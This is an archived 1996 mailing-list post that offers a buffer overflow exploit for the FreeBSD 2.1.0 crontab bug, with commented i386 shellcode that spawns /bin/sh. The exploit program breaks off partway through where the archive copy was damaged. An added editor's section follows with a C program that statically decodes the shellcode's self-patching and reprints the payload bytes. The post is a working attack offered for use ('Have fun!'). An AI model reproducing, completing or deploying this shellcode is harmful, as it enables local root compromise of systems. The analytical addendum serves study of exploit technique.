From owner-freebsd-security Mon Dec 16 03:47:23 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA20725 for security-outgoing; Mon, 16 Dec 1996 03:47:23 -0800 (PST)
Received: from whale.gu.kiev.ua (whale.gu.net [194.93.190.4]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id DAA20710 for ; Mon, 16 Dec 1996 03:47:04 -0800 (PST)
Received: from creator.gu.kiev.ua (stesin@creator.gu.kiev.ua [194.93.190.3]) by whale.gu.kiev.ua (8.7.5/8.7.3) with ESMTP id NAA56002 for ; Mon, 16 Dec 1996 13:46:58 +0200
X-Received: from brimstone (brimstone.netspace.org [128.148.157.143]) by creator.gu.kiev.ua with ESMTP id BAA24287 for ; Sun, 15 Dec 1996 01:19:29 +0200
X-Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <33614-4514>; Sat, 14 Dec 1996 18:18:59 -0500
X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id SAA26868; Sat, 14 Dec 1996 18:06:11 -0500
X-Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 1868880 for BUGTRAQ@NETSPACE.ORG; Sat, 14 Dec 1996 17:57:08 -0500
X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id RAA26060 for ; Sat, 14 Dec 1996 17:56:27 -0500
Approved-By: ALEPH1@UNDERGROUND.ORG
X-Received: from leshka.chuvashia.su (leshka.chuvashia.su [194.58.212.226]) by netspace.org (8.8.2/8.8.2) with ESMTP id RAA22400 for ; Sat, 14 Dec 1996 17:23:38 -0500
X-Received: (from leshka@localhost) by leshka.chuvashia.su (8.8.3/8.8.3) id BAA00961; Sun, 15 Dec 1996 01:24:02 +0300 (MSK)
Approved-By: Leshka Zakharoff
Message-ID: <199612142224.BAA00961@leshka.chuvashia.su>
Date: Sun, 15 Dec 1996 01:24:02 +0300
Reply-To: Leshka Zakharoff
From: Leshka Zakharoff
Subject: Exploit for crontab bug (FreeBSD 2.1.0).
X-To: best-of-security@suburbia.net
To: Multiple recipients of list BUGTRAQ
ReSent-Date: Mon, 16 Dec 1996 13:45:48 +0200 (EET)
ReSent-From: Andrew Stesin
ReSent-To: security@freebsd.org
ReSent-Message-ID:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

/* ---------------------------- CUT HERE ----------------------------------- */
/*                                                                           */
/*                                   Hi !                                    */
/*      This is a buffer overflow exploit for the crontab bug (FreeBSD 2.1.0). */
/*      If you have any problems with it, drop me a letter.                  */
/*                                 Have fun !                                */
/*                                                                           */
/*                                                                           */
/*                          ----------------------                           */
/*                 ---------------------------------------------             */
/*        ----------------- Dedicated to my beautiful lady ------------------ */
/*                 ---------------------------------------------             */
/*                          ----------------------                           */
/*                                                                           */
/*           Leshka Zakharoff, 1996.  E-mail: leshka@leshka.chuvashia.su     */

#include                  /* header name is missing from the archive copy */

main()
{
#define length 353
 int i,j;
 unsigned long start_addr;
 char *env[]={NULL};
 char param_string[length];
 char code_string[]=
 {
  "\xeb\x2a"                       /* jmp cont                          */
/* geteip: */
  "\x5d"                           /* popl %ebp                         */
  "\x55"                           /* pushl %ebp                        */
  "\xfe\x4d\xe7"                   /* decb 0xffffffe7(%ebp)             */
  "\xfe\x4d\xeb"                   /* decb 0xffffffeb(%ebp)             */
  "\xfe\x4d\xec"                   /* decb 0xffffffec(%ebp)             */
  "\xfe\x4d\xed"                   /* decb 0xffffffed(%ebp)             */
  "\xff\x45\xef"                   /* incl 0xffffffef(%ebp)             */
  "\xfe\x4d\xf4"                   /* decb 0xfffffff4(%ebp)             */
  "\xc3"                           /* ret                               */
/* 0xffffffe0(%ebp): */
  "/bin/sh"
/* 0xffffffe7(%ebp): */
  "\x01"
/* execve: */
  "\x8d\x05\x3b\x01\x01\x01"       /* leal 0x3b,%eax                    */
  "\x9a\xff\xff\xff\xff\x07\x01"   /* lcall 0x7,0x0                     */
/* cont: */
  "\xc7\xc4XXXX"                   /* movl $0xXXXXXXXX,%esp             */
  "\xe8\xcb\xff\xff\xff"           /* call geteip                       */
  "\x81\xc5\xef\xff\xff\xff"       /* addl $0xffffffef,%ebp             */
  "\x55"                           /* pushl %ebp                        */
  "\x55"                           /* pushl %ebp                        */
  "\x81\xc5\xf1\xff\xff\xff"       /* addl $0xfffffff1,%ebp             */
  "\x55"                           /* pushl %ebp                        */
  "\xe8\xd4\xff\xff\xff"           /* call execve                       */
 };
 for(i=0;i
 /* The rest of the exploit is missing from the archive copy: everything
    after the '<' on the line above was swallowed by the HTML conversion. */
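An added example, written by the editor and not part of Leshka Zakharoff's post or of FreeBSD, that walks the shellcode above statically instead of running it. It copies the posted bytes, replays the six in-place patches that the geteip stub performs relative to the address popl %ebp receives (the byte after "call geteip", offset 55), and checks what comes out. The point it demonstrates is why the payload ships 0x01 bytes where the execve stub needs 0x00: the NUL ending "/bin/sh", the three high bytes of the syscall number in leal, the 0:7 operand of the lcall and the zero dword that doubles as the empty argv/envp arrays would all stop a C string copy, so they are fixed up at run time. Syscall 0x3b (59) being execve and lcall $7,$0 being the i386 FreeBSD syscall gate are standard facts about FreeBSD 2.x; the 'XXXX' placeholder for the %esp value is kept from the post; the macro and function names (SYS_execve_FREEBSD, decode, branch_target and the rest) are the editor's.

```c
/* Added example, not from the post: static replay of the self-decoding
 * shellcode above. Nothing is executed; the bytes are copied and the six
 * patches done by the "geteip" stub are applied to the copy. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Payload bytes as posted; 'XXXX' is the author's placeholder for %esp. */
static const unsigned char raw_code[] =
    "\xeb\x2a"                      /*  0: jmp cont                         */
    "\x5d\x55"                      /*  2: geteip: popl %ebp; pushl %ebp    */
    "\xfe\x4d\xe7"                  /*  4: decb -0x19(%ebp)                 */
    "\xfe\x4d\xeb"                  /*  7: decb -0x15(%ebp)                 */
    "\xfe\x4d\xec"                  /* 10: decb -0x14(%ebp)                 */
    "\xfe\x4d\xed"                  /* 13: decb -0x13(%ebp)                 */
    "\xff\x45\xef"                  /* 16: incl -0x11(%ebp)                 */
    "\xfe\x4d\xf4"                  /* 19: decb -0x0c(%ebp)                 */
    "\xc3"                          /* 22: ret                              */
    "/bin/sh\x01"                   /* 23: path; 30: 0x01, becomes the NUL  */
    "\x8d\x05\x3b\x01\x01\x01"      /* 31: execve: leal 0x3b,%eax           */
    "\x9a\xff\xff\xff\xff\x07\x01"  /* 37: lcall, operand 0x0107:0xffffffff */
    "\xc7\xc4XXXX"                  /* 44: cont: movl $0xXXXXXXXX,%esp      */
    "\xe8\xcb\xff\xff\xff"          /* 50: call geteip                      */
    "\x81\xc5\xef\xff\xff\xff"      /* 55: addl $-0x11,%ebp                 */
    "\x55\x55"                      /* 61: pushl %ebp (envp); pushl (argv)  */
    "\x81\xc5\xf1\xff\xff\xff"      /* 63: addl $-0x0f,%ebp                 */
    "\x55"                          /* 69: pushl %ebp (path)                */
    "\xe8\xd4\xff\xff\xff";         /* 70: call execve                      */

#define CODE_LEN    (sizeof raw_code - 1)  /* 75 bytes; drop the C terminator */
#define CALL_GETEIP 50
#define GETEIP_EBP  (CALL_GETEIP + 5)      /* value popl %ebp receives: 55 */
#define SYS_execve_FREEBSD 59              /* 0x3b on FreeBSD 2.x i386 (editor's name) */

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(unsigned char *p, uint32_t v)
{
    p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24;
}

/* 0x00 bytes in the raw payload: must be 0, or the string copy that
 * carries the overflow would truncate the payload. */
size_t raw_nul_count(void)
{
    size_t n = 0;
    for (size_t i = 0; i < CODE_LEN; i++) n += (raw_code[i] == 0);
    return n;
}

/* Payload offset that a jmp rel8 (eb) or call rel32 (e8) at 'off' lands on. */
int branch_target(size_t off)
{
    if (raw_code[off] == 0xeb) return (int)off + 2 + (int8_t)raw_code[off + 1];
    if (raw_code[off] == 0xe8) return (int)off + 5 + (int32_t)rd32(raw_code + off + 1);
    return -1;
}

/* Apply the six geteip patches to a copy of the payload. */
void decode(unsigned char *out)
{
    memcpy(out, raw_code, CODE_LEN);
    out[GETEIP_EBP - 0x19]--;      /* "/bin/sh\x01" -> "/bin/sh\0"           */
    out[GETEIP_EBP - 0x15]--;      /* leal disp 3b 01 01 01 -> 3b 00 00 00   */
    out[GETEIP_EBP - 0x14]--;
    out[GETEIP_EBP - 0x13]--;
    wr32(out + GETEIP_EBP - 0x11,  /* lcall offset 0xffffffff -> 0           */
         rd32(out + GETEIP_EBP - 0x11) + 1);
    out[GETEIP_EBP - 0x0c]--;      /* lcall selector 0x0107 -> 0x0007        */
}

/* Pointers the stub pushes after geteip returns, as payload offsets. */
int argv_offset(void) { return GETEIP_EBP - 0x11; }     /* 38: zeroed dword */
int path_offset(void) { return argv_offset() - 0x0f; }  /* 23: "/bin/sh"    */

uint32_t decoded_syscall_number(void)
{ unsigned char b[CODE_LEN]; decode(b); return rd32(b + 33); }
uint32_t decoded_lcall_offset(void)
{ unsigned char b[CODE_LEN]; decode(b); return rd32(b + 38); }
unsigned decoded_lcall_selector(void)
{ unsigned char b[CODE_LEN]; decode(b); return b[42] | (unsigned)b[43] << 8; }
int decoded_path_is_bin_sh(void)
{
    unsigned char b[CODE_LEN]; decode(b);
    return b[30] == 0 && strcmp((const char *)b + path_offset(), "/bin/sh") == 0;
}
/* argv and envp both point at the zeroed lcall operand, so argv[0] == NULL. */
int decoded_argv_is_empty(void)
{ unsigned char b[CODE_LEN]; decode(b); return rd32(b + argv_offset()) == 0; }

int main(void)
{
    printf("raw NUL bytes: %zu; jmp->%d, call geteip->%d, call execve->%d\n",
           raw_nul_count(), branch_target(0), branch_target(50), branch_target(70));
    printf("eax=%u (SYS_execve=%d), lcall $0x%x,$0x%x, path ok=%d, argv empty=%d\n",
           (unsigned)decoded_syscall_number(), SYS_execve_FREEBSD,
           decoded_lcall_selector(), (unsigned)decoded_lcall_offset(),
           decoded_path_is_bin_sh(), decoded_argv_is_empty());
    return 0;
}
```

Running it prints the decoded layout; no byte of the payload is executed. Two details worth noticing: the decoder is position independent because every patch is an offset from the value "call geteip" pushed, and argv and envp both point at offset 38, the lcall displacement that incl just turned into four zero bytes, so execve sees an empty NULL-terminated argument vector without a second run of zeros in the payload.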